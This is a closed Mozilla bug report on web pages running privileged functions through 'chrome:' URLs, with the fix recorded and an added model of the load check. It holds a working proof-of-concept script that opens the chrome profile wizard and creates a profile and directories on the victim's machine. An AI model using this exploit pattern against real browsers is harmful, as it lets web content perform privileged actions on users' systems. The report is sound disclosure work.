Closed
Bug 21923
Opened 25 years ago
Closed 25 years ago
Executing functions in "chrome:" protocol - #2.
Categories
(Core :: Security, defect, P3)
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
There is another chrome vulnerability, which allows executing JavaScript functions in the "chrome:" protocol. This is dangerous because such functions have much more privileges than JavaScript functions loaded from a web page. If one opens a "chrome:" url in a window, he has access to all functions in the window and the functions are executed by "windowname.functionname()" in the "chrome:" protocol. Some of the predefined functions in the Mozilla chrome may do dangerous things.

The code is:
----------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
  b.profile.createNewProfile("georgi","c:\\georgi\\");
  alert("Profile created! You'd better close this window because directories are created");
}
setInterval("g()",4000);
</SCRIPT>
<A HREF="chrome://profile/content/createProfileWizard.xul" TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
Assignee
Updated • 25 years ago
Status: NEW → ASSIGNED
Target Milestone: M13
Assignee
Updated • 25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee
Comment 1 • 25 years ago
Added call to CheckLoadURI from TriggerLink.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
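
Comment 1 puts a load check on the link-activation path. The following is a simplified model of that kind of check, added here as an illustration and not Mozilla's code: the names `checkLoadURI` and `triggerLink` mirror the comment, but their signatures, the scheme table, the `loader` callback and the sample page URL are assumptions.

```javascript
// Added illustration, not Mozilla's implementation. Signatures, the scheme
// table and the loader callback are assumptions made for this example.
const PRIVILEGED_SCHEMES = new Set(["chrome"]);

// Extract the scheme the way a URL parser would see it: strip leading and
// trailing C0 control/space characters, drop embedded tab/CR/LF, lower-case.
function schemeOf(uri) {
  const cleaned = String(uri)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .replace(/[\t\r\n]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null; // null: relative reference
}

// Decide whether content loaded from sourceURI may navigate to targetURI.
function checkLoadURI(sourceURI, targetURI) {
  const src = schemeOf(sourceURI);
  const dst = schemeOf(targetURI) ?? src; // relative links inherit the source scheme
  if (PRIVILEGED_SCHEMES.has(dst) && !PRIVILEGED_SCHEMES.has(src)) {
    return { allowed: false, reason: `${src} content may not load ${dst}: URIs` };
  }
  return { allowed: true, reason: "ok" };
}

// Link activation: the check runs before the load starts, so a denied link
// never places privileged content in the named target window.
function triggerLink(sourceURI, href, targetName, loader) {
  const verdict = checkLoadURI(sourceURI, href);
  if (verdict.allowed) loader(targetName, href);
  return verdict;
}

// Constructed sample input: the link from the report, plus spelling variants
// that must normalise to the same scheme, and one ordinary relative link.
const loads = [];
const record = (win, uri) => loads.push({ win, uri });
const page = "http://example.test/demo.html";
const results = [
  "chrome://profile/content/createProfileWizard.xul",
  " CHROME://profile/content/createProfileWizard.xul",
  "chr\tome://profile/content/createProfileWizard.xul",
  "next.html",
].map((href) => triggerLink(page, href, "victim", record).allowed);
console.log(results, loads);
```

Normalising the scheme before comparing matters: a check that compares the raw string would treat the upper-case and tab-split variants as unprivileged.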